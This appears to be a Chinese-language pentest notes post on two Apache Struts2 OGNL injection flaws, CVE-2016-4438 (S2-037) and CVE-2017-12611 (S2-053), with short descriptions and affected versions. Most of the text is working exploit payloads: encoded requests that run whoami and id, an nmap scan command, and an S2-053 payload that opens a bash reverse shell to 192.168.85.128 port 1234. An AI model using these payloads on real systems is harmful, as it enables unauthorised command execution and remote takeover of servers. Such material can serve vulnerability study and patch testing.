Close

26 5 月, 2024

(CVE-2016-4438)(CVE-2017-12611)

Struts2-037代码执行 (CVE-2016-4438)

Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。这个漏洞和之前S2-032/033是一个地方,都是在DefaultActionInvocation.java的invokeAction方法中没有对于methodName参数内容进行校验,便直接丢到了getValue方法里面,从而造成Ongl表达式的注入。

影响范围:Struts2.3.7 – Struts2.3.28.1 和 Struts2.5.0 – Struts2.5.2 版本

payload:/orders/3/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23process%3D@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]),%23ros%3D(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())%2C@org.apache.commons.io.IOUtils@copy(%23process.getInputStream()%2C%23ros)%2C%23ros.flush(),%23xx%3d123,%23xx.toString.json?&command=whoami
payload:/orders/3/#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,#process=@java.lang.Runtime@getRuntime().exec(#parameters.command[0]),#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()),@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros),#ros.flush(),#xx=123,#xx.toString.json?command=id

Struts2-053 远程代码执行漏洞(CVE-2017-12611)

影响范围:Struts2.0.1-Struts2.3.33,Struts2.5.0-Struts2.5.10

信息收集:nmap 192.168.85.130 -p 8080 -sV -A

%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
shell:%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='bash -i >& /dev/tcp/192.168.85.128/1234 0>&1').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}